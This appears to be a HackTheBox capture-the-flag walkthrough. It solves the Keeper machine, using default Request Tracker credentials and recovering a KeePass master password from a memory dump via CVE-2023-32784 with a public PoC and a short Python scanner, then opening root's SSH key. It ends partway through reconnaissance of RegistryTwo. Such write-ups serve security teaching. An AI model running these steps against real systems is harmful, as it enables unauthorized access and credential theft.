finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.227
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-04 00:47 EST
Nmap scan report for 10.10.11.227
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.227
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-04 00:48 EST
Nmap scan report for 10.10.11.227
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
Visiting http://10.10.11.227
returns a plain page with a single link:
I’ll take this opportunity to brute force for any other subdomains on keeper.htb
with the command:
ffuf -u http://10.10.11.227 -H "Host: FUZZ.keeper.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -mc all
It doesn’t find anything. I’ll add keeper.htb
and tickets.keeper.htb
to my /etc/hosts
file:
10.10.11.227 keeper.htb tickets.keeper.htb
keeper.htb
just returns the same page:
oxdf@hacky$ curl keeper.htb
<html>
<body>
<a href="http://tickets.keeper.htb/rt/">To raise an IT support ticket, please visit tickets.keeper.htb/rt/</a>
</body>
</html>
The site presents an instance of Request Tracker (RT), a free ticketing system:
Without creds, there’s not much else to explore here.
The version of RT is given in the page footer as 4.4.4. A quick search for vulnerabilities in this version didn’t turn up anything too interesting.
The HTTP response headers show nginx:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: RT_SID_tickets.keeper.htb.80=ceaad720182f6b18aea0764ad0c0486b; path=/rt; HttpOnly
Date: Sun, 04 Feb 2024 12:39:56 GMT
Cache-control: no-cache
Pragma: no-cache
X-Frame-Options: DENY
Content-Length: 4236
There’s a cookie set on first visiting the RT page. Nothing else of interest.
Given that this is a known piece of free software, I’m going to skip the directory brute force for now.
Searching for the default creds for RT shows root:password:
Those work here!
Logging in provides access to the dashboard:
There aren’t any tickets appearing in the categories it’s trying to show. There is one Queue, General, which has one new ticket. Clicking on that shows it’s an issue with Keepass:
The ticket history gives a bit more information:
There’s an issue with KeePass, and the lnorgaard user has a crash dump for the root user.
Clicking on the user shows details for the user, but nothing new:
However, as root, I can edit the user (first button from the left in the menu):
This password works for the lnorgaard user over SSH:
oxdf@hacky$ sshpass -p Welcome2023! ssh lnorgaard@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$
And I can grab user.txt
:
lnorgaard@keeper:~$ cat user.txt
f8e0a027************************
As mentioned in the ticket, there’s a zip archive in lnorgaard’s home directory:
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
I’ll pull it back to my host using scp
(it’s 84MB, so it takes a minute):
oxdf@hacky$ sshpass -p 'Welcome2023!' scp lnorgaard@keeper.htb:/home/lnorgaard/RT30000.zip .
It has two files in it:
oxdf@hacky$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
oxdf@hacky$ ls -lh passcodes.kdbx KeePassDumpFull.dmp
-rwxrwx--- 1 root vboxsf 242M May 24 2023 KeePassDumpFull.dmp
-rwxrwx--- 1 root vboxsf 3.6K May 24 2023 passcodes.kdbx
There’s a 2023 information disclosure vulnerability in KeePass (CVE-2023-32784) such that:
In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.
I have a dump of the KeePass memory, so this seems like a good thing to try. I’ll show how to do it from both Linux and Windows.
At the time of Keeper’s release, there was really only one POC exploit on GitHub, named keepass-password-dumper, written in DotNet.
The issue is not that the KeePass key is in memory. It’s that when the user types their password in, the strings that get displayed back end up in memory.
For example, let’s take the password “password”. The first character goes in as a “●” (which is \u25cf
or \xcf\x25
in memory). The next character comes, and it will show up as “●a”. Then the next character will be “●●s”, then “●●●s”, then “●●●●w”, and so on, until we get to “●●●●●●●d”.
The exploits look through memory for strings that start with some number of “●” and then one character, and build out the most likely master key.
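That search can be sketched in a few lines of Python: scan the dump for runs of the UTF-16LE bullet character followed by one plaintext code unit, and bucket the trailing character by how many bullets preceded it. (This is a simplification; the real tools are smarter about offsets and ranking candidates.)

```python
import re

def candidate_chars(dump: bytes) -> dict[int, set[str]]:
    """Map bullet-run length -> plaintext characters seen right after it.
    \xcf\x25 is the UTF-16LE encoding of the mask character \u25cf."""
    found: dict[int, set[str]] = {}
    # one or more bullets, then a single non-bullet UTF-16LE code unit
    for m in re.finditer(b"(?:\xcf\x25)+(..)", dump, re.DOTALL):
        bullets = (m.end() - m.start() - 2) // 2
        ch = m.group(1).decode("utf-16-le", "ignore")
        if ch and ch != "\u25cf":
            found.setdefault(bullets, set()).add(ch)
    return found
```

Feeding it fabricated dump bytes for “●a”, “●●s”, “●●●s” buckets ‘a’ under one bullet and ‘s’ under two and three — that is, the character seen after n bullets is the likely character at position n+1 of the password.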
I can take a look at this manually using strings
and grep
. With -e S
, strings will look for 8-bit characters, which will include what’s needed for the “●” (though it will show up as “%” in my terminal). Then I can grep
for strings that start with two “●” to see potential matches for the keys being input:
oxdf@hacky$ strings -e S KeePassDumpFull.dmp | grep -a $(printf "%b" "\\xCF\\x25\\xCF\\x25")
%%
%%d
%%d
%%%
%%d
%%d
%%d
%%d
%%d
%%d
%%d
%%d
%%%g
%%%g
%%%%
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%%r
%%%%r
%%%%%
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%%
%%%%%
%%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%%d
%%%%%%d
%%%%%%%
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%%
%%%%%%%
%%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%%m
%%%%%%%%m
%%%%%%%%%
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%%
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%%
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%%
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%%
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
This method is crude, but I can see the third character is likely “d”, and then “g” then “r”. This is what the exploit POCs will do, but a bit smarter to find the most likely key.
From a Windows VM, the exploit is rather straightforward. I’ll clone the repo to my host and go into that directory (if git
isn’t installed in your Windows VM, you can also download the ZIP from GitHub and unzip it):
PS C:\Users\0xdf > git clone https://github.com/vdohney/keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 111, done.
remote: Counting objects: 100% (111/111), done.
remote: Compressing objects: 100% (79/79), done.
remote: Total 111 (delta 61), reused 67 (delta 28), pack-reused 0
Receiving objects: 100% (111/111), 200.08 KiB | 3.45 MiB/s, done.
Resolving deltas: 100% (61/61), done.
PS C:\Users\0xdf > cd .\keepass-password-dumper\
Then I just need to dotnet run [dump]
:
PS C:\Users\0xdf\keepass-password-dumper > dotnet run Z:\hackthebox\keeper-10.10.11.227\KeePassDumpFull.dmp
...[snip]...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
That’s most of the password, with the first character missing and options for the second.
Many people seem to say this is not possible from Linux, and that just isn’t true. It does require having dotnet
installed, with the correct runtime version. I had a really tricky time getting that working in my Ubuntu VM. Following these instructions seemed to work to get dotnet
8.0 installed:
oxdf@hacky$ dotnet --list-runtimes
Microsoft.AspNetCore.App 8.0.1 [/usr/share/dotnet/shared/Microsoft.AspNetCore.App]
Microsoft.NETCore.App 8.0.1 [/usr/share/dotnet/shared/Microsoft.NETCore.App]
Running the exploit (going into the exploit directory and running dotnet run [path to dump]
) returns an error:
oxdf@hacky$ dotnet run ~/hackthebox/keeper-10.10.11.227/KeePassDumpFull.dmp
You must install or update .NET to run this application.
App: /opt/keepass-password-dumper/bin/Debug/net7.0/keepass_password_dumper
Architecture: x64
Framework: 'Microsoft.NETCore.App', version '7.0.0' (x64)
.NET location: /usr/share/dotnet
The following frameworks were found:
8.0.1 at [/usr/share/dotnet/shared/Microsoft.NETCore.App]
Learn more:
https://aka.ms/dotnet/app-launch-failed
To install missing framework, download:
https://aka.ms/dotnet-core-applaunch?framework=Microsoft.NETCore.App&framework_version=7.0.0&arch=x64&rid=linux-x64&os=ubuntu.22.04
It seems like I should just be able to install the v7 runtime, but I couldn’t get that to work.
This is a great case to switch to Docker. I asked ChatGPT for the right container:
I’ll run that container (the first time it needs to pull the image down to my host), and it drops me at a root shell:
oxdf@hacky$ docker run --rm -it -v $(pwd):/data mcr.microsoft.com/dotnet/sdk:7.0.100
Unable to find image 'mcr.microsoft.com/dotnet/sdk:7.0.100' locally
7.0.100: Pulling from dotnet/sdk
025c56f98b67: Pull complete
b7bdfde7680c: Pull complete
0722d9f841b1: Pull complete
d16b6cbfeee6: Pull complete
e0fa390bde6c: Pull complete
d37a20633344: Pull complete
e18b62ec28b8: Pull complete
65b988e004de: Pull complete
Digest: sha256:c6c842afe9350ac32fe23188b81d3233a6aebc33d0a569d565f928c4ff8966e1
Status: Downloaded newer image for mcr.microsoft.com/dotnet/sdk:7.0.100
root@8af1c7b7c189:/#
The -v $(pwd):/data
will mount the current directory (where the dump is) into the container in /data
. I’ll clone the exploit and go into that directory:
root@8af1c7b7c189:/# git clone https://github.com/vdohney/keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 111, done.
remote: Counting objects: 100% (111/111), done.
remote: Compressing objects: 100% (79/79), done.
remote: Total 111 (delta 61), reused 67 (delta 28), pack-reused 0
Receiving objects: 100% (111/111), 200.08 KiB | 4.55 MiB/s, done.
Resolving deltas: 100% (61/61), done.
root@8af1c7b7c189:/# cd keepass-password-dumper/
root@8af1c7b7c189:/keepass-password-dumper#
Now the exploit runs fine:
root@8af1c7b7c189:/keepass-password-dumper# dotnet run /data/KeePassDumpFull.dmp
...[snip]...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
That’s the same output as above.
Since the release of Keeper, many Python versions of this exploit have come out. I had a hard time finding one that worked as nicely as the DotNet version. For example, this one will get most of the password:
oxdf@hacky$ python keepass_dump/keepass_dump.py -f KeePassDumpFull.dmp
[*] Searching for masterkey characters
[-] Couldn't find jump points in file. Scanning with slower method.
[*] 0: {UNKNOWN}
[*] 2: d
[*] 3: g
[*] 4: r
[*] 6: d
[*] 7:
[*] 8: m
[*] 9: e
[*] 10: d
[*] 11:
[*] 12: f
[*] 13: l
[*] 15: d
[*] 16: e
[*] Extracted: {UNKNOWN}dgrd med flde
It knows it doesn’t know character 0, but it also skips characters 1, 5, and 14 (5 and 14 show up as “ø” in the original POC). Still, it’s enough to continue.
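Either output leaves a small enough keyspace to brute force. A quick sketch of generating candidate passwords for spraying against the database (the position-2 candidate list comes from the DotNet output above; I’m assuming the unknown first character is printable ASCII):

```python
import string

# Known tail recovered by the dumper; position 1 is fully unknown and
# position 2 has a short candidate list (both from the dumper output).
tail = "dgrød med fløde"
second = ["ø", "Ï", ",", "l", "`", "-", "'", "]", "§", "A", "I", ":", "=", "_", "c", "M"]
first = string.printable.strip()  # assumption: first char is printable ASCII

candidates = [f + s + tail for f in first for s in second]
print(len(candidates))  # ~1500 guesses, trivial to try against a .kdbx
```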
The exploit is unable to recover the first character. The DotNet version also gives a list of possibilities for the second character, and gets the rest. Searching for the string minus the first two characters is enough to find a known phrase:
It’s adding a “rø” to the front, which fits the pattern. Even the less complete output from the Python script works here:
That password works to get into the passcodes.kdbx
file using kpcli
(apt install kpcli
):
oxdf@hacky$ kpcli --kdb passcodes.kdbx
Please provide the master password: *************************
KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
There are two entries in the passcodes/Network
folder:
kpcli:/> ls passcodes/
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls passcodes/Network/
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
I’ll go into that directory:
kpcli:/> cd passcodes/Network/
kpcli:/passcodes/Network>
show
with -f
will show the passwords. For example:
kpcli:/passcodes/Network> show -f 1
Title: Ticketing System
Uname: lnorgaard
Pass: Welcome2023!
URL:
Notes: http://tickets.keeper.htb
The more interesting one is the SSH key for the server:
kpcli:/passcodes/Network> show -f 0
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: F4><3K0nd!
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
...[snip]...
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
To use this key on Linux, I’ll need to convert it to a format that OpenSSH can understand. I’ll need the PuTTY tools (sudo apt install putty-tools
). I’ll save everything in the “Notes” section to a file, and make sure to remove all the leading whitespace from each line.
Then I’ll convert it:
oxdf@hacky$ puttygen root-putty.key -O private-openssh -o ~/keys/keeper-root
Now it works:
oxdf@hacky$ ssh -i ~/keys/keeper-root root@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
...[snip]...
root@keeper:~#
And I’ll grab root.txt
:
root@keeper:~# cat root.txt
c930d7c0************************
RegistryTwo is a very difficult machine focusing on exploiting Java applications. At the start, there’s a Docker Registry and auth server that I’ll use to get an image and find a Java War file that runs the webserver. Enumeration and reversing show multiple vulnerabilities including nginx/Tomcat issues, mass assignment, and session manipulation. I’ll chain those together to get a foothold in the production container. From there, I’ll create a rogue Java RMI client to get file list and read on the host, where I find creds to get a shell. To escalate to root, I’ll wait for the RMI server to restart, and start a rogue server to listen on the port before it can. My server will abuse a process for scanning files with ClamAV and get file read and eventually a shell. In Beyond Root, I’ll go over some unintended paths, and look at the nginx configuration that allows for dynamic creation of different website virtual hosts.
Name | RegistryTwo Play on HackTheBox |
---|---|
Release Date | 22 Jul 2023 |
Retire Date | 03 Feb 2024 |
OS | Linux |
Base Points | Insane [50] |
Rated Difficulty | |
Radar Graph | |
13:18:26 | |
14:54:29 | |
Creator |
nmap
finds four open TCP ports, SSH (22) and three HTTPS (443, 5000, 5001):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.223
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-26 08:01 EST
Nmap scan report for 10.10.11.223
Host is up (0.11s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
5000/tcp open upnp
5001/tcp open commplex-link
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
oxdf@hacky$ nmap -p 22,443,5000,5001 -sCV 10.10.11.223
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-26 08:03 EST
Nmap scan report for 10.10.11.223
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:b0:03:98:7e:60:c2:f3:11:82:27:a1:35:77:9f:d3 (RSA)
| 256 f2:59:06:dc:33:b0:9f:a3:5e:b7:63:ff:61:35:9d:c5 (ECDSA)
|_ 256 e3:ac:ab:ea:2b:d6:8e:f4:1f:b0:7b:05:0a:69:a5:37 (ED25519)
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to https://www.webhosting.htb/
| ssl-cert: Subject: organizationName=free-hosting/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2023-02-01T20:19:22
|_Not valid after: 2024-02-01T20:19:22
5000/tcp open ssl/http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=*.webhosting.htb/organizationName=Acme, Inc./stateOrProvinceName=GD/countryName=CN
| Subject Alternative Name: DNS:webhosting.htb, DNS:webhosting.htb
| Not valid before: 2023-03-26T21:32:06
|_Not valid after: 2024-03-25T21:32:06
5001/tcp open ssl/commplex-link?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 26 Jan 2024 19:38:36 GMT
| Content-Length: 10
| found
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Date: Fri, 26 Jan 2024 19:38:06 GMT
| Content-Length: 26
|_ <h1>Acme auth server</h1>
| ssl-cert: Subject: commonName=*.webhosting.htb/organizationName=Acme, Inc./stateOrProvinceName=GD/countryName=CN
| Subject Alternative Name: DNS:webhosting.htb, DNS:webhosting.htb
| Not valid before: 2023-03-26T21:32:06
|_Not valid after: 2024-03-25T21:32:06
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.80%T=SSL%I=7%D=1/26%Time=65B3AD9E%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,8E,"HTTP/1\.0\x20200\x20OK\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=utf-8\r\nDate:\x20Fri,\x2026\x20Jan\x20202
SF:4\x2019:38:06\x20GMT\r\nContent-Length:\x2026\r\n\r\n<h1>Acme\x20auth\x
SF:20server</h1>\n")%r(HTTPOptions,8E,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nDate:\x20Fri,\x2026\x20Jan\x2020
SF:24\x2019:38:06\x20GMT\r\nContent-Length:\x2026\r\n\r\n<h1>Acme\x20auth\
SF:x20server</h1>\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalSe
SF:rverCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,A7,"HTTP/1
SF:\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/plain;\x20charset=u
SF:tf-8\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x2026\x20Ja
SF:n\x202024\x2019:38:36\x20GMT\r\nContent-Length:\x2010\r\n\r\nNot\x20fou
SF:nd\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.65 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 18.04 bionic. Port 443 is redirecting to www.webhosting.htb
. Port 5000 looks like a Docker Registry. Port 5001 is some kind of HTTP service behind TLS.
The site is clearly using virtual host routing, so I’ll fuzz for additional subdomains that respond differently from the default case (which seems to be a redirect to www.webhosting.htb
). On port 443, it only finds www:
oxdf@hacky$ ffuf -u https://10.10.11.223 -H "Host: FUZZ.webhosting.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.223
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.webhosting.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
www [Status: 200, Size: 23978, Words: 9500, Lines: 670, Duration: 107ms]
:: Progress: [19966/19966] :: Job [1/1] :: 366 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
There’s a lot of fuzzing I should do from here (trying each web service, subdomains of www.webhosting.htb
), but none of them will find anything interesting.
The site is for a web hosting company:
There’s an email on this page (contact@www.webhosting.htb
), but otherwise not much of interest. The “About” page (about.html
) is similar.
The Login and Register forms are similar, and located at /hosting/auth/signin
and /hosting/auth/signup
respectively. I’ll sign up:
On logging in, I’m redirected to /hosting/panel
, where I get a panel to control my domains:
I can create a domain:
And then it gives an index.html
and allows me to add and modify files in the space:
If I click the “Open” button it opens https://www.static-[domain id].webhosting.htb/
. Once I update my /etc/hosts
file, this shows the page:
I’ll look at how the webserver is configured to support dynamic domains like this in Beyond Root.
There’s a profile page (/hosting/profile
) that allows me to update my info and see my domains:
The initial site seems like static HTML. There’s only index.html
and about.html
, and nothing else of interest. Once I get into /hosting
, it behaves differently. On first visiting the signin or signup pages, it sets a JSESSIONID
cookie:
HTTP/1.1 200
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 26 Jan 2024 20:33:04 GMT
Content-Length: 3781
Connection: keep-alive
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=E516DEADF142235D2BEC0D1D5B538F21; Path=/; HttpOnly
This suggests this is a Java application.
I’ll also note a difference in the 404 responses when visiting a non-existent page on the root of the site vs one in the /hosting
folder. /0xdf
returns the nginx 404 page:
/hosting/0xdf
returns a 302 redirect to /hosting/auth/signin
. From this, it seems likely that nginx is handling the root, but forwarding anything in /hosting
to a Java application.
The TLS certificate for the site shows no DNS name or subject alternative names, just the contact email:
I’ll run feroxbuster
against the site. I’m not going to bother with checking the .html
extension (though I might in the background later) as it adds a lot of requests and not much potential value:
oxdf@hacky$ feroxbuster -u https://www.webhosting.htb -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://www.webhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
